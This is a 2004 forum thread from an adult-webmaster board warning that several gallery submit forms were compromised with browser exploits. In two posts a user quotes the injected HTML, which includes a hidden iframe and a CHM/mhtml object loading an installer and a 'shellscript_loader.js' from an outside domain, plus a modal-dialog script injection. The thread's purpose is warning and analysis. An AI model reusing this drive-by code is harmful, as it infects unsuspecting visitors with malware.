Attention! Exploits found on TGP submit forms!

Collapse
X
 
  • Time
  • Show
Clear All
new posts
  • dimonka
    Confirmed User
    • Oct 2002
    • 477

    #1

    Attention! Exploits found on TGP submit forms!

    During last 24 hours several exploits, trojans and other shit was found on following TGP submit forms:

    http://www.boobzillas.com/cgi-bin/tgp/post.cgi
    http://www.mythumbpics.com/cgi-bin/tgp/post.cgi
    http://www.visual-porn.com/cgi-bin/tgp/post.cgi
    http://www.titworld.net/cgi-bin/tgp/post.cgi
    ... and sexls.com

    Be careful! That seems to be a bug in tgp script that allows some motherfuckers to plase exploits on pages!

    Delete these TGPs from your databases ASAP!

    Find out what REBILLS are!
  • dimonka
    Confirmed User
    • Oct 2002
    • 477

    #2
    Bump.... seems like noone cares about viruses... let it be

    Find out what REBILLS are!

    Comment

    • sixxxthsense
      Confirmed User
      • Aug 2004
      • 2419

      #3
      we just dont use IE!

      Comment

      • bringer
        i have man boobies
        • Jul 2003
        • 13082

        #4
        Virus Found!
        Virus name: MHTMLRedir.Exploit

        virii are cool
        333-765-551

        Comment

        • Aquarius
          Confirmed User
          • May 2004
          • 4754

          #5
          I noticed it today, AVG went off when I load the form.

          Comment

          • Aquarius
            Confirmed User
            • May 2004
            • 4754

            #6
            Originally posted by sixxxthsense
            we just dont use IE!
            I was using FireFox.

            Comment

            • dimonka
              Confirmed User
              • Oct 2002
              • 477

              #7
              Originally posted by sixxxthsense
              we just dont use IE!
              Lot of submission tools do though...
              Last edited by dimonka; 08-26-2004, 11:14 AM.

              Find out what REBILLS are!

              Comment

              • Steve
                Confirmed User
                • Feb 2001
                • 6894

                #8
                Yeah, dont bother contacting the site owner, to let him know about it. Just delete the fuckers!

                Comment

                • SmokeyTheBear
                  ►SouthOfHeaven
                  • Jun 2004
                  • 28609

                  #9
                  the exploit is http://www.vesbiz.biz/adverts/05/1.htm
                  hatisblack at yahoo.com

                  Comment

                  • johndoebob
                    Confirmed User
                    • Mar 2004
                    • 3405

                    #10
                    Thanks for the warning.Does your submitter come with it's own database or do you have to add all the TGPs yourself?

                    Comment

                    • SmokeyTheBear
                      ►SouthOfHeaven
                      • Jun 2004
                      • 28609

                      #11
                      the owners possibly dont know about this exploit and its a virus that adds the iframe to every page on the server..
                      hatisblack at yahoo.com

                      Comment

                      • dimonka
                        Confirmed User
                        • Oct 2002
                        • 477

                        #12
                        Originally posted by johndoebob
                        Thanks for the warning.Does your submitter come with it's own database or do you have to add all the TGPs yourself?
                        We currently have about 980 TGP sites in default database for our users. Trying to keep the quality, not numbers.

                        Find out what REBILLS are!

                        Comment

                        • SmokeyTheBear
                          ►SouthOfHeaven
                          • Jun 2004
                          • 28609

                          #13
                          hahahahahahahaha language="hahahahahahahahahaha">
                          var lang = navigator.systemLanguage;
                          if (lang hahahaha "ru") document.location = "home.html";
                          </hahahahahahahaha
                          <html>
                          hahahahahaha>
                          <title></title>
                          </head>
                          <body>
                          <applet CODE="BlackBox.class" width=1 height=1></APPLET>
                          hahahahahahahaha data="ms-its:mhtml:file://C:\\MAIN.MHT!http://www.vesbiz.biz//adverts//05//main.chm::/main.htm" type="text/x-scriptlet"></object>
                          <iframe src="http://www.vesbiz.biz/adverts/05/jss/installer.htm" width=1 height=1></iframe>
                          </body>
                          </html>
                          hatisblack at yahoo.com

                          Comment

                          • SmokeyTheBear
                            ►SouthOfHeaven
                            • Jun 2004
                            • 28609

                            #14
                            this is an old exploit. I dont think it even works anymore. Update your pc
                            hatisblack at yahoo.com

                            Comment

                            • SmokeyTheBear
                              ►SouthOfHeaven
                              • Jun 2004
                              • 28609

                              #15
                              <html>
                              <body>

                              hahahahahahahaha language="hahahahahahahahahaha">

                              function InjectedDuringRedirection(){
                              _showModalDialog('md.htm',window,"dialogTop:-10000\;dialogLeft:-10000\;dialogHeight:1\;dialogWidth:1\;").location= "hahahahahahahahahaha:'hahahahahahahaha SRC=\\'http://www.vesbiz.biz/adverts/05/jss/shellscript_loader.js\\'><\/hahahahahahahaha'";
                              }

                              </hahahahahahahaha

                              hahahahahahahaha language="hahahahahahahahahaha">

                              setTimeout("myiframe.execScript(InjectedDuringRedi rection.toString())",100);
                              setTimeout("myiframe.execScript('InjectedDuringRed irection()') ",101);
                              document.write('<IFRAME ID=myiframe NAME=myiframe SRC="redir.php" WIDTH=200 HEIGHT=200></IFRAME>');

                              </hahahahahahahaha

                              </body>
                              </html>
                              hatisblack at yahoo.com

                              Comment

                              • Basic_man
                                Programming King Pin
                                • Oct 2003
                                • 27360

                                #16
                                Originally posted by dimonka
                                Bump.... seems like noone cares about viruses... let it be
                                I CARE ! Thanks mate !
                                UUGallery Builder - automated photo/video gallery plugin for Wordpress!
                                Stop looking! Checkout Naked Hosting, online since 1999 !

                                Comment

                                • Broda
                                  Confirmed User
                                  • Feb 2003
                                  • 1874

                                  #17
                                  Who cares. Anyone using a browser when submitting is wasting his time anyway.

                                  And most of those sites haven't listed shit in ages, so why submit to them in the first place ;)
                                  CheapAssDesigns.com - when you need quality designs at affordable prices.
                                  icq: 230-729-205
                                  info |at| cheap ass designs dot com

                                  Comment

                                  • fr8
                                    Confirmed User
                                    • Mar 2003
                                    • 5074

                                    #18
                                    Originally posted by sixxxthsense
                                    we just dont use IE!
                                    Some of use dont even use windows. Mozilla is where its at.
                                    joesmut (a) gmail Dot com
                                    Full Stack Developer

                                    Comment

                                    • Dirty F
                                      Too lazy to set a custom title
                                      • Jul 2001
                                      • 59204

                                      #19
                                      Originally posted by bringer
                                      Virus Found!
                                      Virus name: MHTMLRedir.Exploit

                                      virii are cool
                                      Viruses.

                                      Comment

                                      • SmokeyTheBear
                                        ►SouthOfHeaven
                                        • Jun 2004
                                        • 28609

                                        #20
                                        Originally posted by Broda
                                        Who cares. Anyone using a browser when submitting is wasting his time anyway.

                                        And most of those sites haven't listed shit in ages, so why submit to them in the first place ;)
                                        LOL this might be a little biased since you are advertising a tgp submit service.


                                        HandSubmits are still rocking...


                                        BTW to those wondering. after doing a little research on that virus/exploit, i notice the page its hosted on has this on the main domain

                                        www.vesbiz.biz

                                        We are buy iframe traffic, 20$\1k installs
                                        ICQ: 116995240

                                        on each of those pages you specified has an iframe with the exploit from them in it.
                                        hatisblack at yahoo.com

                                        Comment

                                        • SmokeyTheBear
                                          ►SouthOfHeaven
                                          • Jun 2004
                                          • 28609

                                          #21
                                          cliff notes, contact that icq number , they put the virus/exploit on that page. ( or paying the person who is , but as there is no tracking code im assuming its him/her )
                                          hatisblack at yahoo.com

                                          Comment

                                          • Broda
                                            Confirmed User
                                            • Feb 2003
                                            • 1874

                                            #22
                                            Sure, it's biased.

                                            But seems everyone overlooks the relevency in my post.

                                            Who the fuck gives a flying fuck about those tgps mentioned in that list?

                                            Not one of them has listed a single submitted gallery in ages, so only an idiot would ever spend time on visiting those submit form urls ;)
                                            CheapAssDesigns.com - when you need quality designs at affordable prices.
                                            icq: 230-729-205
                                            info |at| cheap ass designs dot com

                                            Comment

                                            • SmokeyTheBear
                                              ►SouthOfHeaven
                                              • Jun 2004
                                              • 28609

                                              #23
                                              Originally posted by Broda

                                              Who the fuck gives a flying fuck about those tgps mentioned in that list?

                                              Not one of them has listed a single submitted gallery in ages, so only an idiot would ever spend time on visiting those submit form urls ;)
                                              this is true but let the newbs learn this themselves
                                              hatisblack at yahoo.com

                                              Comment

                                              • Brinner
                                                Confirmed User
                                                • Jul 2004
                                                • 303

                                                #24
                                                Symantec Anti-Virus.

                                                Comment

                                                • Doctor Dre
                                                  Too lazy to set a custom title
                                                  • Jan 2001
                                                  • 51692

                                                  #25
                                                  Originally posted by sixxxthsense
                                                  we just dont use IE!
                                                  what he said :P viva firefox
                                                  Originally posted by rayadp05
                                                  I rebooted, deleted temp files, history, cookies and everything...still cannot view the news clip. All I see is that fucking gay ass music video from "Rick Roll". Anyone else have a different link to the news clip?

                                                  Comment

                                                  Working...